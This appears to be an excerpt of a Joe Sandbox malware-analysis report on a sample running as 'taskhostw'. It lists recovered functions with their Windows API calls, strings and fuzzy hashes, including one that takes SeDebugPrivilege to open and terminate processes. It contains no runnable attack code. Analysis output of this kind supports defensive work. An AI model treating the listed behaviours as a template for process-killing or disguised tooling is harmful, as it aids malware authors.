Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
Instruction Fuzzy Hash: F471A672A04B16ABE714AF79DC42BAEB3A8AF25724F14422BF514D73C1F770DA408790

Function 0021281F Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0021283A
GetMenuItemInfoW.USER32 ref: 0021289B
SetMenuItemInfoW.USER32 ref: 002128D1
Sleep.KERNEL32(000001F4), ref: 002128E3
GetMenuItemCount.USER32(?), ref: 00212927
GetMenuItemID.USER32(?,00000000), ref: 00212943
GetMenuItemID.USER32(?,-00000001), ref: 0021296D
GetMenuItemID.USER32(?,?), ref: 002129B2
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002129F8
GetMenuItemInfoW.USER32 ref: 00212A0C
SetMenuItemInfoW.USER32 ref: 00212A2D

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 7a1eacb25f211bffcedff46de69dd929a9a45ebc7de1a541fc5706ab0e5ae36e
Instruction ID: 7c97300454c03b4debe16d6f0d5c00851a20a62e30abe99ce2cc1917de68cea4
Opcode Fuzzy Hash: 7a1eacb25f211bffcedff46de69dd929a9a45ebc7de1a541fc5706ab0e5ae36e
Instruction Fuzzy Hash: 7661817092024AEFDB21CF64E9889EEBBF9EF15304F240059F841A7251D771ADB9DB60

Function 00236F55 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00236FD7
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00236FDA
GetWindowLongW.USER32(?,000000F0), ref: 00236FFE
_memset.LIBCMT ref: 0023700F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00237021
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00237099

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 3b4f534d78c7605ef7f447171db068342f3b9fb10d6b2d4fe217b21cc6aa6209
Instruction ID: ae6f227a6ce669511c185bc9aeb9c1019883e5d60ccbc12f048b0cbc6b49a8be
Opcode Fuzzy Hash: 3b4f534d78c7605ef7f447171db068342f3b9fb10d6b2d4fe217b21cc6aa6209
Instruction Fuzzy Hash: 03618EB1910218AFDB20DFA4DC85EEEB7F8EB09710F14415AFA15AB2A1C770AD51DF50

Function 00206EEE Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00206F15
SafeArrayAllocData.OLEAUT32(?), ref: 00206F6E
VariantInit.OLEAUT32(?), ref: 00206F80
SafeArrayAccessData.OLEAUT32(?,?), ref: 00206FA0
VariantCopy.OLEAUT32(?,?), ref: 00206FF3
SafeArrayUnaccessData.OLEAUT32(?,00000002,?,?,?,?,?,?,?,00206CA6), ref: 00207007
VariantClear.OLEAUT32(?), ref: 0020701C
SafeArrayDestroyData.OLEAUT32(?), ref: 00207029
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00207032
VariantClear.OLEAUT32(?), ref: 00207044
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0020704F

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: aaaff27b5db5258880d998a4ff7f47cfc571b779ee28611dcab5a664a39508c0
Instruction ID: 9cdb79450cc55690df9a6836247a9c1c40fb0e01e2ca9b7461ed4b2581cdc2b4
Opcode Fuzzy Hash: aaaff27b5db5258880d998a4ff7f47cfc571b779ee28611dcab5a664a39508c0
Instruction Fuzzy Hash: 91416235D10219AFCB00DF64E848DEEBBB9FF48314F008069EA55A7262CB31A955CF90

Function 002284D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 001B9997: __itow.LIBCMT ref: 001B99C2
Part of subcall function 001B9997: __swprintf.LIBCMT ref: 001B9A0C

CoInitialize.OLE32 ref: 00228518
CoUninitialize.OLE32 ref: 00228523
CoCreateInstance.OLE32(?,00000000,00000017,00242BEC,?), ref: 00228583
IIDFromString.OLE32(?,?), ref: 002285F6
VariantInit.OLEAUT32(?), ref: 00228690
VariantClear.OLEAUT32(?), ref: 002286F1

Strings

NULL Pointer assignment, xrefs: 002285C8
Invalid parameter, xrefs: 0022860F
Failed to create object, xrefs: 0022858E, 00228644

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 463c20d691177aeae49b4d20311cc875235d859198328607bb8a0a9c91a4a923
Instruction ID: 9851bda40d383cf5b53a81a13dff09f7ec12d7a305a12158d8e5b282f53a2e2c
Opcode Fuzzy Hash: 463c20d691177aeae49b4d20311cc875235d859198328607bb8a0a9c91a4a923
Instruction Fuzzy Hash: 6E61D670629311AFD710DF94E848F6EB7E8AF44714F40481DF58597291DB70ED68CB92

Function 0020A473 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32 ref: 0020A782

Strings

NAME, xrefs: 0020A5B4
CLASS, xrefs: 0020A501
CLASSNN, xrefs: 0020A524
TEXT, xrefs: 0020A6B9
INSTANCE, xrefs: 0020A690
REGEXPCLASS, xrefs: 0020A547

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 77f37cb017dc6391b95a870a5c0426bd63e50e1ead836e4bfd59d05058143110
Instruction ID: d03d7d668415e7dc15b6789e67666d6c9759d37aaa3117f833e5e5445e1a7b27
Opcode Fuzzy Hash: 77f37cb017dc6391b95a870a5c0426bd63e50e1ead836e4bfd59d05058143110
Instruction Fuzzy Hash: 3E91C730A20706ABCF18DF60C891BEDFBB9BF14304F948119D459A72D2DF3169A9CB91

Function 001B2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB,?,?,000000FF,?,000000FF), ref: 001B2EAE

Part of subcall function 001B1DB3: GetClientRect.USER32(?,?), ref: 001B1DDC
Part of subcall function 001B1DB3: GetWindowRect.USER32(?,?), ref: 001B1E1D
Part of subcall function 001B1DB3: ScreenToClient.USER32(?,?), ref: 001B1E45

GetDC.USER32 ref: 001ECEB2
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 001ECEC5
SelectObject.GDI32(00000000,00000000), ref: 001ECED3
SelectObject.GDI32(00000000,00000000), ref: 001ECEE8
ReleaseDC.USER32(?,00000000), ref: 001ECEF0
MoveWindow.USER32(?,?,?,?,?,?), ref: 001ECF7B

Strings

U, xrefs: 001ECE50

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 9cbea396b9d2e419d58cc843b608642f03fda4cef8ab79b38c4fe3ebfff1af84
Instruction ID: 295cffabdfe54ced370552615ddab022df125ba76108762a6b193f1eac83c0f3
Opcode Fuzzy Hash: 9cbea396b9d2e419d58cc843b608642f03fda4cef8ab79b38c4fe3ebfff1af84
Instruction Fuzzy Hash: 4D719C31500645EFCF258F65DC84AEEBBB6FF49320F14426AFD555A2A6C7308892DFA0

Function 00228D5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0023F910), ref: 00228E3D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0023F910), ref: 00228E71
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00228FEB
SysFreeString.OLEAUT32(?), ref: 00229015

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 8d5aaa9d6e744940a240718a09ff92459d2be7d2d094955d4cc976d299a04b3e
Instruction ID: 84f37a1009899767bf2e19f371496c7023096c39d4d92896dff2ed411a518915
Opcode Fuzzy Hash: 8d5aaa9d6e744940a240718a09ff92459d2be7d2d094955d4cc976d299a04b3e
Instruction Fuzzy Hash: 08F14971A1021AFFCB04DF94D988EAEB7B9BF49315F108058F919AB250CB71EE55CB50

Function 00214D68 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 002146AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002136DB,?), ref: 002146CC

Part of subcall function 002146AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002136DB,?), ref: 002146E5

Part of subcall function 00214AD8: GetFileAttributesW.KERNEL32(?,0021374F), ref: 00214AD9

lstrcmpiW.KERNEL32(?,?), ref: 00214DE7
_wcscmp.LIBCMT ref: 00214E01
MoveFileW.KERNEL32 ref: 00214E1C

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 28fd21badfb5444ab5f6f9b5db21d1651c0618d8f8706bcdc4148b91badcd41e
Instruction ID: 540f61577a31dd633a9ef6fe06308e2281eff0444f9a445e15f5eed829e1eb1e
Opcode Fuzzy Hash: 28fd21badfb5444ab5f6f9b5db21d1651c0618d8f8706bcdc4148b91badcd41e
Instruction Fuzzy Hash: 845164B24183859BC724EFA0D881DDFB7ECAFA5300F10092EF599D3151EF74A6988766

Function 00238677 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001), ref: 00238731

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 97301ae0ebdec8afdfc63a575cf4794ec81f5c097157d6d7e7824c9b42d07e2d
Instruction ID: dc57a2ded1103b8cdc73c3712ee460374f667f0304301990eb6cb97b29bd8165
Opcode Fuzzy Hash: 97301ae0ebdec8afdfc63a575cf4794ec81f5c097157d6d7e7824c9b42d07e2d
Instruction Fuzzy Hash: 7351B3B0520319BFEB249F29DC8AB997B69EB05350F604515FA15EE1E0CFB1E9A0CF50

Function 001B2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32 ref: 001EC477
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001EC499
LoadImageW.USER32 ref: 001EC4B1
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 001EC4CF
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001EC4F0
DestroyIcon.USER32(00000000), ref: 001EC4FF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 001EC51C
DestroyIcon.USER32(?), ref: 001EC52B

Part of subcall function 0023A4E1: DeleteObject.GDI32(00000000), ref: 0023A51A

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 208d55e4c26ecdc5dc543d48cfc1255428335c5b3442108dc9ad325619d7b34d
Instruction ID: 72252ff4f1d7fd92fa6b1ec12218ab63f4a1664973e68b25786b014685d6a483
Opcode Fuzzy Hash: 208d55e4c26ecdc5dc543d48cfc1255428335c5b3442108dc9ad325619d7b34d
Instruction Fuzzy Hash: 9D517A70A00609EFDB24DF29ED45FAA7BB5EB58710F100528F90697290DBB0ED91DB90

Function 00208BE3 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00208864,00000B00,?,?), ref: 00208BEC
HeapAlloc.KERNEL32(00000000,?,00208864,00000B00,?,?), ref: 00208BF3
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00208864,00000B00,?,?), ref: 00208C08
GetCurrentProcess.KERNEL32(?,00000000,?,00208864,00000B00,?,?), ref: 00208C10
DuplicateHandle.KERNEL32 ref: 00208C13
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00208864,00000B00,?,?), ref: 00208C23
GetCurrentProcess.KERNEL32(00208864,00000000,?,00208864,00000B00,?,?), ref: 00208C2B
DuplicateHandle.KERNEL32 ref: 00208C2E
CreateThread.KERNEL32(00000000,00000000,00208C54,00000000,00000000,00000000), ref: 00208C48

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: ceb5c04107e06e530910397d22d1b6b469e4f94b5eecf3d007a9e5b378630bd4
Instruction ID: 1be9a647ea6217112f5b651d7821b1b15d04744e08398e2b57c13d816c9d8ccb
Opcode Fuzzy Hash: ceb5c04107e06e530910397d22d1b6b469e4f94b5eecf3d007a9e5b378630bd4
Instruction Fuzzy Hash: C301BBB5640348FFE750ABA5FD4DF6B3BACEB89711F004421FA49DB1A1CA709804DB20

Function 00236DB2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00236E56
SendMessageW.USER32(?,00001036,00000000,?), ref: 00236E6A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00236E84
_wcscat.LIBCMT ref: 00236EDF
SendMessageW.USER32(?,00001057,00000000,?), ref: 00236EF6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00236F24

Strings

SysListView32, xrefs: 00236E28

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 5588d62d314933413dacb88da277eaf293c58674d4ef3b6af936fe8da235b758
Instruction ID: 4a70459b914275e21de44ec8668679d4438fcd757819fdb2186cba37050aba0d
Opcode Fuzzy Hash: 5588d62d314933413dacb88da277eaf293c58674d4ef3b6af936fe8da235b758
Instruction Fuzzy Hash: 9F41C0B0A10309BBEB219F64DC89FEEB7ACEF08350F10442AF555A7291D7729D948B60

Function 0022EA47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00213C99: CreateToolhelp32Snapshot.KERNEL32 ref: 00213CBE
Part of subcall function 00213C99: Process32FirstW.KERNEL32(00000000,?), ref: 00213CCC
Part of subcall function 00213C99: CloseHandle.KERNEL32(00000000), ref: 00213D96

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0022EAB8
GetLastError.KERNEL32 ref: 0022EACB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0022EAFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 0022EB77
GetLastError.KERNEL32(00000000), ref: 0022EB82
CloseHandle.KERNEL32(00000000), ref: 0022EBB7

Strings

SeDebugPrivilege, xrefs: 0022EAD6

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: b68f7b94d6f4137d444b85a2c439a0e82734e298fdb3fe21cd526601fce39938
Instruction ID: 9447467deaa7890fcb3e3dce486675a3a4032b621d5d4bc9be6eceafcfca1807
Opcode Fuzzy Hash: b68f7b94d6f4137d444b85a2c439a0e82734e298fdb3fe21cd526601fce39938
Instruction Fuzzy Hash: A641E130610211AFDB14EF64EC96FADB7A1BF50714F05805CF9469B2D2CBB4A824DF81

Function 02AB85FE Relevance: 12.3, APIs: 8, Instructions: 322COMMON

Download Yara Rule

APIs

Part of subcall function 02AB8408: __time64.LIBCMT ref: 02AB8412

Part of subcall function 02A54445: _fseek.LIBCMT ref: 02A5445D

__wsplitpath.LIBCMT ref: 02AB86DD

Part of subcall function 02A7366E: __wsplitpath_helper.LIBCMT ref: 02A736AE

_wcscpy.LIBCMT ref: 02AB86F0
_wcscat.LIBCMT ref: 02AB8703
__wsplitpath.LIBCMT ref: 02AB8728
_wcscat.LIBCMT ref: 02AB873E
_wcscat.LIBCMT ref: 02AB8751

Part of subcall function 02AB844E: _memmove.LIBCMT ref: 02AB8487
Part of subcall function 02AB844E: _memmove.LIBCMT ref: 02AB8496

_wcscmp.LIBCMT ref: 02AB8698

Part of subcall function 02AB8BDD: _wcscmp.LIBCMT ref: 02AB8CCD
Part of subcall function 02AB8BDD: _wcscmp.LIBCMT ref: 02AB8CE0

_wcsncpy.LIBCMT ref: 02AB896E

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _wcscat_wcscmp$__wsplitpath_memmove$__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 2744720387-0
Opcode ID: 3f3dfb22d26f6a159bee78abb3726d03450e3d1cb18015426b1c2ca3c1fd6652
Instruction ID: fcd451251dc3a4b7de28f701058957bf5d35fe55ae864683c511dd13635f8f08
Opcode Fuzzy Hash: 3f3dfb22d26f6a159bee78abb3726d03450e3d1cb18015426b1c2ca3c1fd6652
Instruction Fuzzy Hash: 6CC109B1D40229AFDF11DFA5CD84ADEBBBDAF48310F0040AAE609E7151DB749A84CF65

Function 00214339 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00214353
LoadStringW.USER32(00000000), ref: 0021435A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00214370
LoadStringW.USER32(00000000), ref: 00214377
_wprintf.LIBCMT ref: 0021439D
MessageBoxW.USER32 ref: 002143BB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00214398

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 5cd0727407dda030b91c0ed86586a69dbaaf9be11e63fe50e8af2725da89ea02
Instruction ID: 265febb56e2086ccf0c45f494cf6d99fa3bc45fd86acded8bc25d8e3aa3781c5
Opcode Fuzzy Hash: 5cd0727407dda030b91c0ed86586a69dbaaf9be11e63fe50e8af2725da89ea02
Instruction Fuzzy Hash: BB014FF2900208BFE791ABA4BE89EE6776CD708301F1005A6BB59E2051EA749E954F71

Function 001B2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?), ref: 001B2ACF
ShowWindow.USER32(FFFFFFFF,00000000), ref: 001B2B17
ShowWindow.USER32(FFFFFFFF,00000006), ref: 001EC39A
ShowWindow.USER32(FFFFFFFF,?), ref: 001EC406

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
